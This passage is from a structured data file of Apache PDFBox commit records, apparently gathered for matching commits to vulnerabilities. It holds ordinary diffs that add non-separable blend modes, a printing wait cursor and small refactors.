BlendMode.NORMAL)", - "- {", - "- return AlphaComposite.getInstance(AlphaComposite.SRC_OVER, constantAlpha);", - "- }", - "- else", - "- {", - "- return new BlendComposite(blendMode, constantAlpha);", - "- }", - "- }", - "-", - "- // TODO - non-separable blending modes", - "-", - "- private final BlendMode blendMode;", - "- private final float constantAlpha;", - "-", - "- private BlendComposite(BlendMode blendMode, float constantAlpha)", - "- {", - "- super();", - "- this.blendMode = blendMode;", - "- this.constantAlpha = constantAlpha;", - "- }", - "-", - "- @Override", - "- public CompositeContext createContext(ColorModel srcColorModel, ColorModel dstColorModel,", - "- RenderingHints hints)", - "- {", - "- return new BlendCompositeContext(srcColorModel, dstColorModel, hints);", - "- }", - "-", - "- class BlendCompositeContext implements CompositeContext", - "- {", - "- private final ColorModel srcColorModel;", - "- private final ColorModel dstColorModel;", - "- private final RenderingHints hints;", - "-", - "- BlendCompositeContext(ColorModel srcColorModel, ColorModel dstColorModel,", - "- RenderingHints hints)", - "- {", - "- this.srcColorModel = srcColorModel;", - "- this.dstColorModel = dstColorModel;", - "- this.hints = hints;", - "- }", - "-", - "- @Override", - "- public void dispose()", - "- {", - "- // nothing needed", - "- }", - "-", - "- @Override", - "- public void compose(Raster src, Raster dstIn, WritableRaster dstOut)", - "- {", - "- int x0 = src.getMinX();", - "- int y0 = src.getMinY();", - "- int width = Math.min(Math.min(src.getWidth(), dstIn.getWidth()), dstOut.getWidth());", - "- int height = Math.min(Math.min(src.getHeight(), dstIn.getHeight()), dstOut.getHeight());", - "- int x1 = x0 + width;", - "- int y1 = y0 + height;", - "- int dstInXShift = dstIn.getMinX() - x0;", - "- int dstInYShift = dstIn.getMinY() - y0;", - "- int dstOutXShift = dstOut.getMinX() - x0;", - "- int dstOutYShift = dstOut.getMinY() - y0;", - "-", - "- ColorSpace srcColorSpace = srcColorModel.getColorSpace();", - "- int numSrcColorComponents = srcColorModel.getNumColorComponents();", - "- int numSrcComponents = src.getNumBands();", - "- boolean srcHasAlpha = (numSrcComponents > numSrcColorComponents);", - "- ColorSpace dstColorSpace = dstColorModel.getColorSpace();", - "- int numDstColorComponents = dstColorModel.getNumColorComponents();", - "- int numDstComponents = dstIn.getNumBands();", - "- boolean dstHasAlpha = (numDstComponents > numDstColorComponents);", - "-", - "- int colorSpaceType = dstColorSpace.getType();", - "- boolean subtractive = (colorSpaceType != ColorSpace.TYPE_RGB)", - "- && (colorSpaceType != ColorSpace.TYPE_GRAY);", - "-", - "- boolean blendModeIsSeparable = blendMode instanceof SeparableBlendMode;", - "- SeparableBlendMode separableBlendMode = blendModeIsSeparable ?", - "- (SeparableBlendMode) blendMode : null;", - "-", - "- boolean needsColorConversion = !srcColorSpace.equals(dstColorSpace);", - "-", - "- Object srcPixel = null;", - "- Object dstPixel = null;", - "- float[] srcComponents = new float[numSrcComponents];", - "- // PDFBOX-3501 let getNormalizedComponents allocate to avoid ", - "- // ArrayIndexOutOfBoundsException for bitonal target", - "- float[] dstComponents = null;", - "-", - "- float[] srcColor = new float[numSrcColorComponents];", - "- float[] srcConverted;", - "-", - "- for (int y = y0; y < y1; y++)", - "- {", - "- for (int x = x0; x < x1; x++)", - "- {", - "- srcPixel = src.getDataElements(x, y, srcPixel);", - "- dstPixel = dstIn.getDataElements(dstInXShift + x, dstInYShift + y, dstPixel);", - "-", - "- srcComponents = srcColorModel.getNormalizedComponents(srcPixel, srcComponents,", - "- 0);", - "- dstComponents = dstColorModel.getNormalizedComponents(dstPixel, dstComponents,", - "- 0);", - "-", - "- float srcAlpha = srcHasAlpha ? srcComponents[numSrcColorComponents] : 1.0f;", - "- float dstAlpha = dstHasAlpha ? dstComponents[numDstColorComponents] : 1.0f;", - "-", - "- srcAlpha = srcAlpha * constantAlpha;", - "-", - "- float resultAlpha = dstAlpha + srcAlpha - srcAlpha * dstAlpha;", - "- float srcAlphaRatio = (resultAlpha > 0) ? srcAlpha / resultAlpha : 0;", - "-", - "- // convert color", - "- System.arraycopy(srcComponents, 0, srcColor, 0, numSrcColorComponents);", - "- if (needsColorConversion)", - "- {", - "- // TODO - very very slow - Hash results???", - "- float[] cieXYZ = srcColorSpace.toCIEXYZ(srcColor);", - "- srcConverted = dstColorSpace.fromCIEXYZ(cieXYZ);", - "- }", - "- else", - "- {", - "- srcConverted = srcColor;", - "- }", - "-", - "- if (separableBlendMode != null)", - "- {", - "- for (int k = 0; k < numDstColorComponents; k++)", - "- {", - "- float srcValue = srcConverted[k];", - "- float dstValue = dstComponents[k];", - "-", - "- if (subtractive)", - "- {", - "- srcValue = 1 - srcValue;", - "- dstValue = 1 - dstValue;", - "- }", - "-", - "- float value = separableBlendMode.blendChannel(srcValue, dstValue);", - "- value = srcValue + dstAlpha * (value - srcValue);", - "- value = dstValue + srcAlphaRatio * (value - dstValue);", - "-", - "- if (subtractive)", - "- {", - "- value = 1 - value;", - "- }", - "-", - "- dstComponents[k] = value;", - "- }", - "- }", - "- else", - "- {", - "- // TODO - nonseparable modes", - "- }", - "-", - "- if (dstHasAlpha)", - "- {", - "- dstComponents[numDstColorComponents] = resultAlpha;", - "- }", - "-", - "- dstPixel = dstColorModel.getDataElements(dstComponents, 0, dstPixel);", - "- dstOut.setDataElements(dstOutXShift + x, dstOutYShift + y, dstPixel);", - "- }", - "- }", - "- }", - "- }", - "-}", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.pdmodel.graphics.blend;", - "+", - "+import java.awt.AlphaComposite;", - "+import java.awt.Composite;", - "+import java.awt.CompositeContext;", - "+import java.awt.RenderingHints;", - "+import java.awt.color.ColorSpace;", - "+import java.awt.image.ColorModel;", - "+import java.awt.image.Raster;", - "+import java.awt.image.WritableRaster;", - "+import org.apache.commons.logging.Log;", - "+import org.apache.commons.logging.LogFactory;", - "+", - "+/**", - "+ * AWT composite for blend modes.", - "+ * ", - "+ * @author K\u00c3\u00bchn & Weyh Software GmbH", - "+ */", - "+public final class BlendComposite implements Composite", - "+{", - "+ /**", - "+ * Log instance.", - "+ */", - "+ private static final Log LOG = LogFactory.getLog(BlendComposite.class);", - "+", - "+ /**", - "+ * Creates a blend composite", - "+ *", - "+ * @param blendMode Desired blend mode", - "+ * @param constantAlpha Constant alpha, must be in the inclusive range", - "+ * [0.0...1.0] or it will be clipped.", - "+ * @return a blend composite.", - "+ */", - "+ public static Composite getInstance(BlendMode blendMode, float constantAlpha)", - "+ {", - "+ if (constantAlpha < 0)", - "+ {", - "+ LOG.warn(\"using 0 instead of incorrect Alpha \" + constantAlpha);", - "+ constantAlpha = 0;", - "+ }", - "+ else if (constantAlpha > 1)", - "+ {", - "+ LOG.warn(\"using 1 instead of incorrect Alpha \" + constantAlpha);", - "+ constantAlpha = 1;", - "+ }", - "+ if (blendMode == BlendMode.NORMAL)", - "+ {", - "+ return AlphaComposite.getInstance(AlphaComposite.SRC_OVER, constantAlpha);", - "+ }", - "+ else", - "+ {", - "+ return new BlendComposite(blendMode, constantAlpha);", - "+ }", - "+ }", - "+", - "+ private final BlendMode blendMode;", - "+ private final float constantAlpha;", - "+", - "+ private BlendComposite(BlendMode blendMode, float constantAlpha)", - "+ {", - "+ super();", - "+ this.blendMode = blendMode;", - "+ this.constantAlpha = constantAlpha;", - "+ }", - "+", - "+ @Override", - "+ public CompositeContext createContext(ColorModel srcColorModel, ColorModel dstColorModel,", - "+ RenderingHints hints)", - "+ {", - "+ return new BlendCompositeContext(srcColorModel, dstColorModel, hints);", - "+ }", - "+", - "+ class BlendCompositeContext implements CompositeContext", - "+ {", - "+ private final ColorModel srcColorModel;", - "+ private final ColorModel dstColorModel;", - "+ private final RenderingHints hints;", - "+", - "+ BlendCompositeContext(ColorModel srcColorModel, ColorModel dstColorModel,", - "+ RenderingHints hints)", - "+ {", - "+ this.srcColorModel = srcColorModel;", - "+ this.dstColorModel = dstColorModel;", - "+ this.hints = hints;", - "+ }", - "+", - "+ @Override", - "+ public void dispose()", - "+ {", - "+ // nothing needed", - "+ }", - "+", - "+ @Override", - "+ public void compose(Raster src, Raster dstIn, WritableRaster dstOut)", - "+ {", - "+ int x0 = src.getMinX();", - "+ int y0 = src.getMinY();", - "+ int width = Math.min(Math.min(src.getWidth(), dstIn.getWidth()), dstOut.getWidth());", - "+ int height = Math.min(Math.min(src.getHeight(), dstIn.getHeight()), dstOut.getHeight());", - "+ int x1 = x0 + width;", - "+ int y1 = y0 + height;", - "+ int dstInXShift = dstIn.getMinX() - x0;", - "+ int dstInYShift = dstIn.getMinY() - y0;", - "+ int dstOutXShift = dstOut.getMinX() - x0;", - "+ int dstOutYShift = dstOut.getMinY() - y0;", - "+", - "+ ColorSpace srcColorSpace = srcColorModel.getColorSpace();", - "+ int numSrcColorComponents = srcColorModel.getNumColorComponents();", - "+ int numSrcComponents = src.getNumBands();", - "+ boolean srcHasAlpha = (numSrcComponents > numSrcColorComponents);", - "+ ColorSpace dstColorSpace = dstColorModel.getColorSpace();", - "+ int numDstColorComponents = dstColorModel.getNumColorComponents();", - "+ int numDstComponents = dstIn.getNumBands();", - "+ boolean dstHasAlpha = (numDstComponents > numDstColorComponents);", - "+", - "+ int srcColorSpaceType = srcColorSpace.getType();", - "+ int dstColorSpaceType = dstColorSpace.getType();", - "+ boolean subtractive = (dstColorSpaceType != ColorSpace.TYPE_RGB)", - "+ && (dstColorSpaceType != ColorSpace.TYPE_GRAY);", - "+", - "+ boolean blendModeIsSeparable = blendMode instanceof SeparableBlendMode;", - "+ SeparableBlendMode separableBlendMode = blendModeIsSeparable ?", - "+ (SeparableBlendMode) blendMode : null;", - "+ NonSeparableBlendMode nonSeparableBlendMode = !blendModeIsSeparable ?", - "+ (NonSeparableBlendMode) blendMode : null;", - "+", - "+ boolean needsColorConversion = !srcColorSpace.equals(dstColorSpace);", - "+", - "+ Object srcPixel = null;", - "+ Object dstPixel = null;", - "+ float[] srcComponents = new float[numSrcComponents];", - "+ // PDFBOX-3501 let getNormalizedComponents allocate to avoid ", - "+ // ArrayIndexOutOfBoundsException for bitonal target", - "+ float[] dstComponents = null;", - "+", - "+ float[] srcColor = new float[numSrcColorComponents];", - "+ float[] srcConverted;", - "+ float[] dstConverted;", - "+ float[] rgbResult = blendModeIsSeparable ? null : new float[dstHasAlpha ? 4 : 3];", - "+", - "+ for (int y = y0; y < y1; y++)", - "+ {", - "+ for (int x = x0; x < x1; x++)", - "+ {", - "+ srcPixel = src.getDataElements(x, y, srcPixel);", - "+ dstPixel = dstIn.getDataElements(dstInXShift + x, dstInYShift + y, dstPixel);", - "+", - "+ srcComponents = srcColorModel.getNormalizedComponents(srcPixel, srcComponents,", - "+ 0);", - "+ dstComponents = dstColorModel.getNormalizedComponents(dstPixel, dstComponents,", - "+ 0);", - "+", - "+ float srcAlpha = srcHasAlpha ? srcComponents[numSrcColorComponents] : 1.0f;", - "+ float dstAlpha = dstHasAlpha ? dstComponents[numDstColorComponents] : 1.0f;", - "+", - "+ srcAlpha = srcAlpha * constantAlpha;", - "+", - "+ float resultAlpha = dstAlpha + srcAlpha - srcAlpha * dstAlpha;", - "+ float srcAlphaRatio = (resultAlpha > 0) ? srcAlpha / resultAlpha : 0;", - "+", - "+ if (separableBlendMode != null)", - "+ {", - "+ // convert color", - "+ System.arraycopy(srcComponents, 0, srcColor, 0, numSrcColorComponents);", - "+ if (needsColorConversion)", - "+ {", - "+ // TODO - very very slow - Hash results???", - "+ float[] cieXYZ = srcColorSpace.toCIEXYZ(srcColor);", - "+ srcConverted = dstColorSpace.fromCIEXYZ(cieXYZ);", - "+ }", - "+ else", - "+ {", - "+ srcConverted = srcColor;", - "+ }", - "+ ", - "+ for (int k = 0; k < numDstColorComponents; k++)", - "+ {", - "+ float srcValue = srcConverted[k];", - "+ float dstValue = dstComponents[k];", - "+", - "+ if (subtractive)", - "+ {", - "+ srcValue = 1 - srcValue;", - "+ dstValue = 1 - dstValue;", - "+ }", - "+", - "+ float value = separableBlendMode.blendChannel(srcValue, dstValue);", - "+ value = srcValue + dstAlpha * (value - srcValue);", - "+ value = dstValue + srcAlphaRatio * (value - dstValue);", - "+", - "+ if (subtractive)", - "+ {", - "+ value = 1 - value;", - "+ }", - "+", - "+ dstComponents[k] = value;", - "+ }", - "+ }", - "+ else", - "+ {", - "+ // Nonseparable blend modes are computed in RGB color space.", - "+ // TODO - CMYK color spaces need special treatment.", - "+", - "+ if (srcColorSpaceType == ColorSpace.TYPE_RGB)", - "+ {", - "+ srcConverted = srcComponents;", - "+ }", - "+ else", - "+ {", - "+ srcConverted = srcColorSpace.toRGB(srcComponents);", - "+ }", - "+", - "+ if (dstColorSpaceType == ColorSpace.TYPE_RGB)", - "+ {", - "+ dstConverted = dstComponents;", - "+ }", - "+ else", - "+ {", - "+ dstConverted = dstColorSpace.toRGB(dstComponents);", - "+ }", - "+ ", - "+ nonSeparableBlendMode.blend(srcConverted, dstConverted, rgbResult);", - "+", - "+ for (int k = 0; k < 3; k++)", - "+ {", - "+ float srcValue = srcConverted[k];", - "+ float dstValue = dstConverted[k];", - "+ float value = rgbResult[k];", - "+ value = Math.max(Math.min(value, 1.0f), 0.0f);", - "+ value = srcValue + dstAlpha * (value - srcValue);", - "+ value = dstValue + srcAlphaRatio * (value - dstValue);", - "+ rgbResult[k] = value;", - "+ }", - "+", - "+ if (dstColorSpaceType == ColorSpace.TYPE_RGB)", - "+ {", - "+ System.arraycopy(rgbResult, 0, dstComponents, 0, dstComponents.length);", - "+ }", - "+ else", - "+ {", - "+ float[] temp = dstColorSpace.fromRGB(rgbResult);", - "+ System.arraycopy(temp, 0, dstComponents, 0,", - "+ Math.min(dstComponents.length, temp.length));", - "+ }", - "+ }", - "+", - "+ if (dstHasAlpha)", - "+ {", - "+ dstComponents[numDstColorComponents] = resultAlpha;", - "+ }", - "+", - "+ dstPixel = dstColorModel.getDataElements(dstComponents, 0, dstPixel);", - "+ dstOut.setDataElements(dstOutXShift + x, dstOutYShift + y, dstPixel);", - "+ }", - "+ }", - "+ }", - "+ }", - "+}", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "index 00b8dd1d2..cc6624e89 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "@@ -204,2 +204,165 @@ public abstract class BlendMode", - "+ public static final NonSeparableBlendMode HUE = new NonSeparableBlendMode()", - "+ {", - "+ @Override", - "+ public void blend(float[] srcValues, float[] dstValues, float[] result)", - "+ {", - "+ float[] temp = new float[3];", - "+ getSaturationRGB(dstValues, srcValues, temp);", - "+ getLuminosityRGB(dstValues, temp, result);", - "+ }", - "+ };", - "+", - "+ public static final NonSeparableBlendMode SATURATION = new NonSeparableBlendMode()", - "+ {", - "+ @Override", - "+ public void blend(float[] srcValues, float[] dstValues, float[] result)", - "+ {", - "+ getSaturationRGB(srcValues, dstValues, result);", - "+ }", - "+ };", - "+", - "+ public static final NonSeparableBlendMode COLOR = new NonSeparableBlendMode()", - "+ {", - "+ @Override", - "+ public void blend(float[] srcValues, float[] dstValues, float[] result)", - "+ {", - "+ getLuminosityRGB(dstValues, srcValues, result);", - "+ }", - "+ };", - "+", - "+ public static final NonSeparableBlendMode LUMINOSITY = new NonSeparableBlendMode()", - "+ {", - "+ @Override", - "+ public void blend(float[] srcValues, float[] dstValues, float[] result)", - "+ {", - "+ getLuminosityRGB(srcValues, dstValues, result);", - "+ }", - "+ };", - "+", - "+ private static int get255Value(float val)", - "+ {", - "+ return (int) Math.floor(val >= 1.0 ? 255 : val * 255.0);", - "+ }", - "+", - "+ private static void getSaturationRGB(float[] srcValues, float[] dstValues, float[] result)", - "+ {", - "+ int minb;", - "+ int maxb;", - "+ int mins;", - "+ int maxs;", - "+ int y;", - "+ int scale;", - "+ int r;", - "+ int g;", - "+ int b;", - "+", - "+ int rd = get255Value(dstValues[0]);", - "+ int gd = get255Value(dstValues[1]);", - "+ int bd = get255Value(dstValues[2]);", - "+ int rs = get255Value(srcValues[0]);", - "+ int gs = get255Value(srcValues[1]);", - "+ int bs = get255Value(srcValues[2]);", - "+", - "+ minb = Math.min(rd, Math.min(gd, bd));", - "+ maxb = Math.max(rd, Math.max(gd, bd));", - "+ if (minb == maxb)", - "+ {", - "+ /* backdrop has zero saturation, avoid divide by 0 */", - "+ result[0] = gd / 255.0f;", - "+ result[1] = gd / 255.0f;", - "+ result[2] = gd / 255.0f;", - "+ return;", - "+ }", - "+", - "+ mins = Math.min(rs, Math.min(gs, bs));", - "+ maxs = Math.max(rs, Math.max(gs, bs));", - "+", - "+ scale = ((maxs - mins) << 16) / (maxb - minb);", - "+ y = (rd * 77 + gd * 151 + bd * 28 + 0x80) >> 8;", - "+ r = y + ((((rd - y) * scale) + 0x8000) >> 16);", - "+ g = y + ((((gd - y) * scale) + 0x8000) >> 16);", - "+ b = y + ((((bd - y) * scale) + 0x8000) >> 16);", - "+", - "+ if (((r | g | b) & 0x100) == 0x100)", - "+ {", - "+ int scalemin;", - "+ int scalemax;", - "+ int min;", - "+ int max;", - "+", - "+ min = Math.min(r, Math.min(g, b));", - "+ max = Math.max(r, Math.max(g, b));", - "+", - "+ if (min < 0)", - "+ {", - "+ scalemin = (y << 16) / (y - min);", - "+ }", - "+ else", - "+ {", - "+ scalemin = 0x10000;", - "+ }", - "+", - "+ if (max > 255)", - "+ {", - "+ scalemax = ((255 - y) << 16) / (max - y);", - "+ }", - "+ else", - "+ {", - "+ scalemax = 0x10000;", - "+ }", - "+", - "+ scale = Math.min(scalemin, scalemax);", - "+ r = y + (((r - y) * scale + 0x8000) >> 16);", - "+ g = y + (((g - y) * scale + 0x8000) >> 16);", - "+ b = y + (((b - y) * scale + 0x8000) >> 16);", - "+ }", - "+ result[0] = r / 255.0f;", - "+ result[1] = g / 255.0f;", - "+ result[2] = b / 255.0f;", - "+ }", - "+", - "+ private static void getLuminosityRGB(float[] srcValues, float[] dstValues, float[] result)", - "+ {", - "+ int delta;", - "+ int scale;", - "+ int r;", - "+ int g;", - "+ int b;", - "+ int y;", - "+ int rd = get255Value(dstValues[0]);", - "+ int gd = get255Value(dstValues[1]);", - "+ int bd = get255Value(dstValues[2]);", - "+ int rs = get255Value(srcValues[0]);", - "+ int gs = get255Value(srcValues[1]);", - "+ int bs = get255Value(srcValues[2]);", - "+ delta = ((rs - rd) * 77 + (gs - gd) * 151 + (bs - bd) * 28 + 0x80) >> 8;", - "+ r = (rd + delta);", - "+ g = (gd + delta);", - "+ b = (bd + delta);", - "+", - "+ if (((r | g | b) & 0x100) == 0x100)", - "+ {", - "+ y = (rs * 77 + gs * 151 + bs * 28 + 0x80) >> 8;", - "+ if (delta > 0)", - "+ {", - "+ int max;", - "+ max = Math.max(r, Math.max(g, b));", - "+ scale = (max == y ? 0 : ((255 - y) << 16) / (max - y));", - "+ }", - "+ else", - "+ {", - "+ int min;", - "+ min = Math.min(r, Math.min(g, b));", - "+ scale = (y == min ? 0 : (y << 16) / (y - min));", - "+ }", - "+ r = y + (((r - y) * scale + 0x8000) >> 16);", - "+ g = y + (((g - y) * scale + 0x8000) >> 16);", - "+ b = y + (((b - y) * scale + 0x8000) >> 16);", - "+ }", - "+ result[0] = r / 255.0f;", - "+ result[1] = g / 255.0f;", - "+ result[2] = b / 255.0f;", - "+ }", - "+", - " // this map *must* come after the declarations above, otherwise its values will be null", - "@@ -223,3 +386,6 @@ public abstract class BlendMode", - " map.put(COSName.EXCLUSION, BlendMode.EXCLUSION);", - "- // TODO - non-separable blending modes", - "+ map.put(COSName.HUE, BlendMode.HUE);", - "+ map.put(COSName.SATURATION, BlendMode.SATURATION);", - "+ map.put(COSName.LUMINOSITY, BlendMode.LUMINOSITY);", - "+ map.put(COSName.COLOR, BlendMode.COLOR);", - " return map;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4095": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "5a2463f8299d8fb93ae7bfd06890c3386ca7462a" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4095", - "relevance": 2 - } - ] - }, - { - "commit_id": "df3d48ee137520ce3827bbfde5c22e02f8a84895", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524072275, - "hunks": 2, - "message": "PDFBOX-2941: show wait cursor when printing git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829459 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "index c59fb8880..e7a5656d5 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "@@ -20,2 +20,3 @@ import java.awt.BorderLayout;", - " import java.awt.Component;", - "+import java.awt.Cursor;", - " import java.awt.Dimension;", - "@@ -1130,3 +1131,11 @@ public class PDFDebugger extends JFrame", - " {", - "- job.print(pras);", - "+ setCursor(Cursor.getPredefinedCursor(Cursor.WAIT_CURSOR));", - "+ try", - "+ {", - "+ job.print(pras);", - "+ }", - "+ finally", - "+ {", - "+ setCursor(Cursor.getDefaultCursor());", - "+ }", - " }" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-2941": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "e2924fb97f723b7ae6f55e255a90badb68cee0fc" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-2941", - "relevance": 2 - } - ] - }, - { - "commit_id": "956ef712ca62c13350db3a74495c1e5cfdd271aa", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530368478, - "hunks": 2, - "message": "PDFBOX-4184: make flate compression level public to allow access in future image compression code, as suggested by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834740 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java b/pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java", - "index 1f63e8454..bb4aec338 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java", - "@@ -167,2 +167,18 @@ public abstract class Filter", - "+ /**", - "+ * @return the ZIP compression level configured for PDFBox", - "+ */", - "+ public static int getCompressionLevel()", - "+ {", - "+ int compressionLevel = Deflater.DEFAULT_COMPRESSION;", - "+ try", - "+ {", - "+ compressionLevel = Integer.parseInt(System.getProperty(Filter.SYSPROP_DEFLATELEVEL, \"-1\"));", - "+ }", - "+ catch (NumberFormatException ex)", - "+ {", - "+ LOG.warn(ex.getMessage(), ex);", - "+ }", - "+ return Math.max(-1, Math.min(Deflater.BEST_COMPRESSION, compressionLevel));", - "+ }", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java b/pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java", - "index 3cc8a65ed..7c43a7dab 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java", - "@@ -120,12 +120,3 @@ final class FlateFilter extends Filter", - " {", - "- int compressionLevel = Deflater.DEFAULT_COMPRESSION;", - "- try", - "- {", - "- compressionLevel = Integer.parseInt(System.getProperty(Filter.SYSPROP_DEFLATELEVEL, \"-1\"));", - "- }", - "- catch (NumberFormatException ex)", - "- {", - "- LOG.warn(ex.getMessage(), ex);", - "- }", - "- compressionLevel = Math.max(-1, Math.min(Deflater.BEST_COMPRESSION, compressionLevel));", - "+ int compressionLevel = getCompressionLevel();", - " Deflater deflater = new Deflater(compressionLevel);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java", - "pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "7d06d7a609d32e52a0f19d4bc8cbd7438f472d9c" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "e74d4b2ce7cbaff9195c79d4332a428b4647f19f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526762576, - "hunks": 29, - "message": "PDFBOX-3353: sonar fix git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831922 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java", - "index a389cee91..6846ca430 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java", - "@@ -193,6 +193,3 @@ public class FDFAnnotationLine extends FDFAnnotation", - " {", - "- if (style == null)", - "- {", - "- style = PDAnnotationLine.LE_NONE;", - "- }", - "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", - " COSArray array = (COSArray) annot.getDictionaryObject(COSName.LE);", - "@@ -201,3 +198,3 @@ public class FDFAnnotationLine extends FDFAnnotation", - " array = new COSArray();", - "- array.add(COSName.getPDFName(style));", - "+ array.add(COSName.getPDFName(actualStyle));", - " array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", - "@@ -207,3 +204,3 @@ public class FDFAnnotationLine extends FDFAnnotation", - " {", - "- array.setName(0, style);", - "+ array.setName(0, actualStyle);", - " }", - "@@ -235,6 +232,3 @@ public class FDFAnnotationLine extends FDFAnnotation", - " {", - "- if (style == null)", - "- {", - "- style = PDAnnotationLine.LE_NONE;", - "- }", - "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", - " COSArray array = (COSArray) annot.getDictionaryObject(COSName.LE);", - "@@ -244,3 +238,3 @@ public class FDFAnnotationLine extends FDFAnnotation", - " array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", - "- array.add(COSName.getPDFName(style));", - "+ array.add(COSName.getPDFName(actualStyle));", - " annot.setItem(COSName.LE, array);", - "@@ -249,3 +243,3 @@ public class FDFAnnotationLine extends FDFAnnotation", - " {", - "- array.setName(1, style);", - "+ array.setName(1, actualStyle);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java", - "index 